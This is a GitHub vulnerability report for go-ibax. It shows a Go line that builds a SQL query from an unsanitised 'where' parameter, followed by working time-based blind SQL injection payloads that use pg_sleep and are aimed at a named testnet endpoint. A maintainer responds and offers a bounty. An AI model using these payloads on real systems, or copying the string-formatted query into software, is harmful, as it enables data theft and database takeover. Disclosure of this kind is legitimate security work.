
SQL injection vulnerability via where parameter #2063

Open
4 tasks done
QSec-Team opened this issue Oct 24, 2022 · 1 comment

Comments


QSec-Team commented Oct 24, 2022

Describe the bug

SQL Injection vulnerability in /packages/api/database.go of go-ibax via the where parameter allows an attacker to spoof identity, tamper with existing data, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become an administrator of the database server. This issue affects versions starting from commits on Jul 18, 2020.

file:

sqlQuest = fmt.Sprintf(`select * from "%s" where %s order by %s offset %d limit %d`, tableName, where, execOrder, (page-1)*limit, limit)

commits:
ac76098#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174

POC:
Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData: order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1

Reproduction

Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo
Request Method: POST
PostData:
order=1&where=1=1%3b%3bselect+pg_sleep(10)%3b--&table_name=pg_user&limit=1&page=1

As you can see, when I use pg_sleep, the request is delayed 10s.

PostData:
order=1&where=1=1%3b%3bselect+case+when((select+length(current_database()))=4)+then+pg_sleep(5)+else+pg_sleep(0)+end%3b--&table_name=pg_user&limit=1&page=1

As you can see, when I use pg_sleep to judge the length of current_database, it shows 4.

System Info

*

Logs

No response

Validations

scottafk pushed a commit that referenced this issue Dec 2, 2022
@yolandadadada
Member

Thank you for your interest in our project. The IBAX development community welcomes hardcore developers like you, which is quite exciting for the IBAX network, which is still under development and has not really started rolling out yet.

Regarding the few bugs you mentioned, they lie in the interface services provided to the blockchain explorer for the IBAX testnet, which is an old-version problem and is part of the deprecated, useless code that no longer works in the current version. Of course, we will remove this useless code.

Anyway, thank you again for your dedication and help. Please contact Yolanda (Telegram: @yolandadadada), and the IBAX Foundation will reward you with 1000 IBXC (IBAX Native Coin). We hope that good developers like you will continue to follow us, and maybe we can work together in the future.
